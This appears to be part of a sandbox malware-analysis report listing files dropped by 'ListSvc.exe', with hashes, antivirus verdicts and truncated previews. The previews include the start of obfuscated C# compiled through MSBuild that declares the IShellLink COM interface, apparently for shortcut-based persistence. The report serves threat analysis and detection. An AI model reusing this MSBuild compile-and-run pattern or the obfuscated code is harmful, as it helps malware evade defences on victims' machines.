Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.t.x.m.5.3.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.t.x.m.5.3.j.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.0.cs Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	994217
Entropy (8bit):	3.137022799472748
Encrypted:	false
SSDEEP:	1536:f0bIbxbybnbeb5bbbzbhbfb1EyaB8J1zhz1tKHnCLQnMu+mP/5uGeLaeAEpjgyZs:cctm7KFXHlrhI
MD5:	25B8A3D5F53CB4DBDAA9B33D7B898892
SHA1:	0564EE2458D4A05ECE1AB8B4CF9908544604C1E1
SHA-256:	6A9BF352653D52E091E64E3A030B462D7570199FA66B8487320948D4F5019CCE
SHA-512:	6223F50C7AA6DB3EE7F6B6377C22837A2E479612DA85CA8B9EFB7A10C8865C96C4A2A6FB7FD18170D19A0961494C91B5CF3461B63EA93116BEC83F9E8025D039
Malicious:	false
Reputation:	unknown
Preview:	.using System;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;using System.Runtime.InteropServices;using System.Runtime.InteropServices.ComTypes;using System.Diagnostics;using System.IO;using System.Text;..public class PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb : Task..{..[ComImport][Guid("00021401-0000-0000-C000-000000000046")]..internal class hHrqxrywMJodutkNBahWofbpoBVwlPllkQNAZaCxeBgPYGlegSDbWndcFccVvbkWxcSDGKNBxKRMYmqHqRqsmkpXN{}..[ComImport][InterfaceType(ComInterfaceType.InterfaceIsIUnknown)][Guid("000214F9-0000-0000-C000-000000000046")]..internal interface LUWXGbdqjrVOHywfcDlvqdsMuFELSKnMUQUPRERJO..{void GetPath();void GetIDList();void SetIDList();void GetDescription();void SetDescription();void GetWorkingDirectory();void SetWorkingDirectory();void GetArguments();void SetArguments([MarshalAs(UnmanagedType.LPWStr)] string wPVvTIsTnkGeBwHBkCbwryzdjTRDHnxMBHUoxqBWlSEAGIstnnGbQnwYpRmaRPlZM);void GetHotkey();void SetHotkey();void GetShowCmd();void SetShowCmd(int UDUCteTa);vo

C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	666
Entropy (8bit):	5.388292974218944
Encrypted:	false
SSDEEP:	12:p3rkTZJUZuJnkTZ8uBk/Kynq2KOkxvNa+nZadyA:VgTZJuuJnkTZ8uBk/KyKOkja+nZaT
MD5:	7F242F3F0ED12A4F7F67CCD8B0B57FDA
SHA1:	31B449CD366A1CA5266E639D3F166D40915F905D
SHA-256:	8FF959C002DCBA8D1E881FB522E31A0B73326A52EF07EE29842864B40830DA0C
SHA-512:	F1A01ABEC4110ECA48E0A95B07CF80E06C97D58778671B537CBF2396B337C4E839EC12D42708936377FA6635907267C208C28F7DCB0AE0375CA099D34321D1E5
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll" /out:"C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll" /D:DEBUG /debug+ /optimize- "C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.0.cs"

C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	306176
Entropy (8bit):	7.145136642755913
Encrypted:	false
SSDEEP:	6144:kBOvi8BkObtqcSa/Cq8SQzrEHPfachwujhjQjinH9fPbQp8ZG:kBOvVPFppasPBHhfnNPbux
MD5:	F03532B180831B692EF19B078134453B
SHA1:	005520D404BB610748603BC607EB181108445365
SHA-256:	9D7CA12B784BCDDE99379858F0CBCE1215CC5DA48A86FB943FB5BB4069E4FC95
SHA-512:	23E7B7AB44C9DB037AEF1E7FABC66F1569D8061CBB82296C803DF735C44451F9BFAFB30DD917BD1A63D584E64EFACCA8A886362FA79BB337A0E94949898FA4ED
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa...........!................~.... ........... ....................... ............@.................................0...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.................0...........{.....+.."..}.....0...........{.....+.."..}....4.9...../.".....r4:!..-.p.......:.4....."4!0F.....2....^;9'(....pG#..T...>8.......+'...>-G.5 (".)<'3..21.mGa^GDWAq...,.0.<y....\|."......8.!K>..(..%.(8..)=....)1.0.%#..J.:=....uYk.....`x........".'..^$?)......(!.0.....-'...9=4..<...#>2l1....3.pwtdpLQBD..Ym.YiQpttd0HQBDnbYmXYiQpttdpHQBDnbYmXYiQpttdpH.BDnlF.VY.X.U.e<.p.,..y.6.#..T..&?-0N.<M*,.q..T ?.q/+..w`USMQpttdpH..Dn.XnX..O.ttdpHQBD.b[lSXaQp.pdpBQBDnbYc.]iQPttdpHQBD.b

C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	data
Category:	dropped
Size (bytes):	23398
Entropy (8bit):	1.4371679341344064
Encrypted:	false
SSDEEP:	48:vzErInlSQkFbVvcWJvq4ZW1e239z5BQUwXGIceicQet/A:vorI4QqbVcwvq4oh/QUwXGc9L
MD5:	370042E4B374C992D2B80399FDB69C80
SHA1:	CCBCE10C7A77AC3848BE7AADB6AE6C4774C75D52
SHA-256:	447C99321699A1A12FAD194EA0B276A312B2688247C49C231F00A68EDED8728D
SHA-512:	9D1DA8B7E74CF0DE5122D7CE4C40BF8906DB34B57249B616DCDA1D459DACBCEEE33B3EC86D9541D2CAE6BCC0AF7889B162A74493B288595CD0147FFD85348F3C
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_isdecmp.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_setup64.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp Download File
Process:	C:\Users\user\Desktop\ListSvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3152896
Entropy (8bit):	6.362346476757271
Encrypted:	false
SSDEEP:	49152:REA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVv3338y:192bz2Eb6pd7B6bAGx75333J
MD5:	41DE4778D27FFED036A89EF9E32156EE
SHA1:	8C50519D3800244664DF5F23634BD1F024DDBA97
SHA-256:	B9BAB37CE865A8E9CC7068F7CE9ED324517DD2D309502981664FECEADDAF95CB
SHA-512:	31FC31D25202E062557F1E7E39DA97EFF46B8D234D9D747BB49248DD38B29C6A555DF020C5FDAC61CDE80315857CD16249CD633BEB8628B964945E829B62C167
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.p.....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc...p.....-.......-.............@..@..............1.......0.............@..@........................................................

C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp Download File
Process:	C:\Users\user\Desktop\ListSvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3152896
Entropy (8bit):	6.362346476757271
Encrypted:	false
SSDEEP:	49152:REA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVv3338y:192bz2Eb6pd7B6bAGx75333J
MD5:	41DE4778D27FFED036A89EF9E32156EE
SHA1:	8C50519D3800244664DF5F23634BD1F024DDBA97
SHA-256:	B9BAB37CE865A8E9CC7068F7CE9ED324517DD2D309502981664FECEADDAF95CB
SHA-512:	31FC31D25202E062557F1E7E39DA97EFF46B8D234D9D747BB49248DD38B29C6A555DF020C5FDAC61CDE80315857CD16249CD633BEB8628B964945E829B62C167
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.p.....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc...p.....-.......-.............@..@..............1.......0.............@..@........................................................

C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_isdecmp.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_setup64.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1199072332279307
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry3Nqak7YnqqiNbPN5Dlq5J:+RI+ycuZhNvqakS0bPNnqX
MD5:	6030A91C9D319700E2A8B04C3937E48F
SHA1:	6DBA8EDFA1EACF4D98E20B4AD704F25BF896A286
SHA-256:	737A10DC3A49792AFAD28DA493B08C733FCC10C95EAEB32B50B885409AD3B97E
SHA-512:	16EFFFA3ED3501191EC5C66758128405E24BB37D1236822E618B7856B88A4C0783FC47CCB7965F81F7279AD0F619B4B467790B15724BD189B5ED6DBD43996551
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.u.k.k.z.m.i.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.u.k.k.z.m.i.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.0.cs Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	994217
Entropy (8bit):	3.137022799472748
Encrypted:	false
SSDEEP:	1536:f0bIbxbybnbeb5bbbzbhbfb1EyaB8J1zhz1tKHnCLQnMu+mP/5uGeLaeAEpjgyZs:cctm7KFXHlrhI
MD5:	25B8A3D5F53CB4DBDAA9B33D7B898892
SHA1:	0564EE2458D4A05ECE1AB8B4CF9908544604C1E1
SHA-256:	6A9BF352653D52E091E64E3A030B462D7570199FA66B8487320948D4F5019CCE
SHA-512:	6223F50C7AA6DB3EE7F6B6377C22837A2E479612DA85CA8B9EFB7A10C8865C96C4A2A6FB7FD18170D19A0961494C91B5CF3461B63EA93116BEC83F9E8025D039
Malicious:	false
Reputation:	unknown
Preview:	.using System;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;using System.Runtime.InteropServices;using System.Runtime.InteropServices.ComTypes;using System.Diagnostics;using System.IO;using System.Text;..public class PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb : Task..{..[ComImport][Guid("00021401-0000-0000-C000-000000000046")]..internal class hHrqxrywMJodutkNBahWofbpoBVwlPllkQNAZaCxeBgPYGlegSDbWndcFccVvbkWxcSDGKNBxKRMYmqHqRqsmkpXN{}..[ComImport][InterfaceType(ComInterfaceType.InterfaceIsIUnknown)][Guid("000214F9-0000-0000-C000-000000000046")]..internal interface LUWXGbdqjrVOHywfcDlvqdsMuFELSKnMUQUPRERJO..{void GetPath();void GetIDList();void SetIDList();void GetDescription();void SetDescription();void GetWorkingDirectory();void SetWorkingDirectory();void GetArguments();void SetArguments([MarshalAs(UnmanagedType.LPWStr)] string wPVvTIsTnkGeBwHBkCbwryzdjTRDHnxMBHUoxqBWlSEAGIstnnGbQnwYpRmaRPlZM);void GetHotkey();void SetHotkey();void GetShowCmd();void SetShowCmd(int UDUCteTa);vo

C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	666
Entropy (8bit):	5.392854649245099
Encrypted:	false
SSDEEP:	12:p3rkTZJUZuJnkTZ8uBk/Kynq2KOkxvNaTQnZad:VgTZJuuJnkTZ8uBk/KyKOkjaTQnZad
MD5:	3B4F3749684112DFCE294B0DD4CD3D13
SHA1:	FA105CB037831588D6FDBB214876A5B12835D2DC
SHA-256:	5CC994674976B2DCAF4AD23C59217AF2F941DEBD1695E0109BCD83024B4EBF4D
SHA-512:	454F74F6DBBCB9B6564F50B9577AA5C4A97A0ABB0FBB42381D84EDF73CE7F23C45A68D5DA923E81293C9C78F27BDEF0CE8E9B76F61D2DA7DC09ABCC98672F62E
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll" /out:"C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.dll" /D:DEBUG /debug+ /optimize- "C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.0.cs"

C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	306176
Entropy (8bit):	7.145185898516166
Encrypted:	false
SSDEEP:	6144:XBOvi8BkObtqcSa/Cq8SQzrEHPfachwujhjQjinH9fPbQp8ZG:XBOvVPFppasPBHhfnNPbux
MD5:	877D1001774B68B489DBE618CD4C8BB4
SHA1:	89DCCB6653B0B599952931CC2764F5D2BDAABB3B
SHA-256:	7A9100C0D91CD8D1A666B93C1440CE1D319720A0D93807A39A3EF880402BAF00
SHA-512:	B7285D38D96EF1821487C5F024ADDF74320E11EBE238B5B542FF519B4A59BFC28A6CB8F28B431759065BE5C62DFCB7AF9E55A943D36FB1CD50B4BCB44C29D97E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa...........!................~.... ........... ....................... ............@.................................0...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.................0...........{.....+.."..}.....0...........{.....+.."..}....4.9...../.".....r4:!..-.p.......:.4....."4!0F.....2....^;9'(....pG#..T...>8.......+'...>-G.5 (".)<'3..21.mGa^GDWAq...,.0.<y....\|."......8.!K>..(..%.(8..)=....)1.0.%#..J.:=....uYk.....`x........".'..^$?)......(!.0.....-'...9=4..<...#>2l1....3.pwtdpLQBD..Ym.YiQpttd0HQBDnbYmXYiQpttdpHQBDnbYmXYiQpttdpH.BDnlF.VY.X.U.e<.p.,..y.6.#..T..&?-0N.<M*,.q..T ?.q/+..w`USMQpttdpH..Dn.XnX..O.ttdpHQBD.b[lSXaQp.pdpBQBDnbYc.]iQPttdpHQBD.b

C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	data
Category:	dropped
Size (bytes):	23398
Entropy (8bit):	1.4333514028545924
Encrypted:	false
SSDEEP:	48:vvrInvKkFbVvcWJvq4ZW1e23745BQUwC5eieXu8/A:vvrIyqbVcwvq4or4/QUwCsLXr
MD5:	D901188846C17153AD14DB369950C5F5
SHA1:	FC9A7CA4FCD35107093B4F8D0C3B87D928330AA5
SHA-256:	8BA18845F25CEF402B86DDF0950431F75A42FADC2D86CE8F14283623B8B4BB2B
SHA-512:	05C1C6035F08BAB015CB7DD5364ADEB4F9F77D6128EEC9B6BA57E4A16E2B0F3B2F83BD16A4F40C616845B0467C77E2E7E584EAD37F6C83A9B7352E199E7D729E
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\AppLaunch.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102568
Entropy (8bit):	6.274915370413725
Encrypted:	false
SSDEEP:	1536:f+O0+0BABvzenRuFTKLNkG1xkQJVkMTUuhkHyC+dBsE:f+T+JzeRuFTIkakMTUuhdTn
MD5:	4DF5F963C7E18F062E49870D0AFF8F6F
SHA1:	0A033024346BF706CAD68E90A14C0D651B123EC2
SHA-256:	CFA7D98AD44C7FB11DE5FF07DA04F8FD4A3423564DE05F87BA5E10BD13A1FE59
SHA-512:	67086DA7E21E60E0DDF66CEE090AD1ACCC8D9D7F627942ECFE1BD8E9E47E98FE9A50B9F077FBA7584A002B7BE5D6DE18B4DD84268B441509DB18D822ABF9D81B
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...D...D.....n.E.......@.......F.......Q.......J...Z.A.F...D.........k.M.......Y.....-.E.......E...RichD...................PE..L...qn.\.........."..........6...............0....@..................................E....@...... ...........................Q.......`...............R...>...p..........T...............................@............P...............................text...D........................... ..`.data........0......................@....idata..6....P......................@..@.rsrc........`.......,..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ListSvc.url (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	995050
Entropy (8bit):	3.1455468631456025
Encrypted:	false
SSDEEP:	1536:D0bIbxbybnbeb5bbbzbhbfb1EyaB8J1zhz1tKHnCLQnMu+mP/5uGeLaeAEpjgyZe:octm7KFXHlrhS
MD5:	00FECA5191FF48C74192C719F7F8011A
SHA1:	1692160FEE1D7581715481C704E16004B5C02192
SHA-256:	CCC01534C2379A0B9F65674B2CC62BFC52B6A5AF3D027D33AC99165BC89ED26A
SHA-512:	F99EBB08F408190B373AD7F9006978CDEFF17CDB19363243D576536A7555AF77557CDAE8A3F3A4D9E6A5D787BA4ED2B3548D3AD2839E27AE3A3C0639D26FF734
Malicious:	false
Reputation:	unknown
